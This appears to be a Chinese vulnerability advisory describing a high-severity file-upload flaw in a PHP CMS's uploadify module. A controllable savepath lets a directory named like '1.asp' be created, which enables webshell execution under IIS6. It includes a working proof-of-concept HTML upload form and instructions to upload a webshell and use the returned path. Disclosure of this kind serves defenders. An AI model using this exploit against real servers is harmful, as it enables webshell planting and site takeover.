- 發(fā)布時(shí)間:2017-01-02
- 公開時(shí)間:N/A
- 漏洞類型:文件上傳
- 危害等級(jí):高
- 漏洞編號(hào):xianzhi-2017-01-73318655
- 測(cè)試版本:N/A
漏洞詳情
app/system/include/module/uploadify.class.php 65行
public function doupfile(){
global $M;
$this->upfile->set_upfile();
$info['savepath'] = $_M['form']['savepath'];
$info['format'] = $_M['form']['format'];
$info['maxsize'] = $_M['form']['maxsize'];
$info['is_rename'] = $_M['form']['is_rename'];
$info['is_overwrite'] = $_M['form']['is_overwrite'];
$this->set_upload($info);
$back = $this->upload($_M['form']['formname']);
if($_M['form']['type']==1){
if($back['error']){
$back['error'] = $back['errorcode'];
}else{
$backs['path'] = $back['path'];
$backs['append'] = 'false';
$back = $backs;
}
}
echo jsonencode($back);
}
$_M['form']來自$(POST|GET|COOKIE)
savepath可控導(dǎo)致且當(dāng)目錄不存在時(shí)自動(dòng)新建 導(dǎo)致IIS6下解析漏洞getshell
測(cè)試方法
<form id="form" action="http://xxxxx.com/app/system/entrance.php?c=uploadify&a=doupfile" method="POST" enctype ="multipart/form-data">
savepath:<input type="text" name="savepath" value="1.asp"><br />
format:<input type="text" name="format" value="rar|zip|sql|doc|pdf|jpg|xls|png|gif|mp3|jpeg|bmp|swf|flv|ico"><br />
maxsize:<input type="text" name="maxsize" value="1111111111111111"><br />
is_rename:<input type="text" name="is_rename" value="0"><br />
is_overwrite:<input type="text" name="is_overwrite" value="1"><br />
formname:<input type="text" name="formname" value="file"><br />
<input type="file" name="file">
<input type="submit" value="submit">
</form>
<br />
選擇一個(gè)后綴在上面列表中的馬submit即可
返回帶路徑 直接用
view.png